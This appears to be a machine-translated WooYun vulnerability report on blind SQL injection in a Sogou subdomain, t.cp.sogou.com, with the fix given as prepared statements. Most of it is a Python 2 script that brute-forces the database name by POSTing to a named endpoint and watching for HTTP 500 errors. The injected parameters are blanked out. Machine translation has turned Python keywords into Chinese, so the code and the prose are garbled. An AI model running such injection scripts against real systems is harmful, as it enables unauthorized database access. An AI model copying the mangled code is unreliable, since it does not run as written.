漏洞标题 某个搜狗站有SQL注入(带验证脚本) 相关制造商 搜狗 漏洞作者 时Vinc 提交时间 2016-04-23 09: 26 公共时间 2016-06-11 18: 50 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 Sql注入 漏洞详细信息 网站:t.cp.sogou.com 什么时候:
对于Flase:
Database()长度为10
漏洞证明: # - * - 编码: utf8 - * - #编码=UTF-8 导入httplib 进口时间 导入字符串 导入系统 导入urllib 导入urllib2 headers={ 'User-Agent':'Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,如Gecko)Chrome/28.0.1500.63 Safari/537.36', 'Content-Type':'application/x-www-form-urlencoded' } Payloads=list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 @ _。') 打印'[%s]开始重试MySQL数据库()'%time.strftime('%H:%M:%S',time.localtime()) 数据库='' 对于范围(1,11,1):中的i 对于有效负载:中的有效负载 试试: Params=urllib.urlencode('''''''''''' Conn=httplib.HTTPConnection('t.cp.sogou.com',timeout=20) Conn.request(method='POST',url='/yllt/ylltTool11x5/ltTool11x5/dataFile.php',body=params,headers=headers) Status=conn.getresponse()。status 如果status==500: 数据库+=有效负载 打印'\ r [正在扫描]',数据库 Time.sleep(0.01) 打破 Conn.close() 除了例外,e: 打印e 打印'' 打印'database()is',数据库 修理计划: 预编译处理 版权声明:请注明出处Vinc @乌云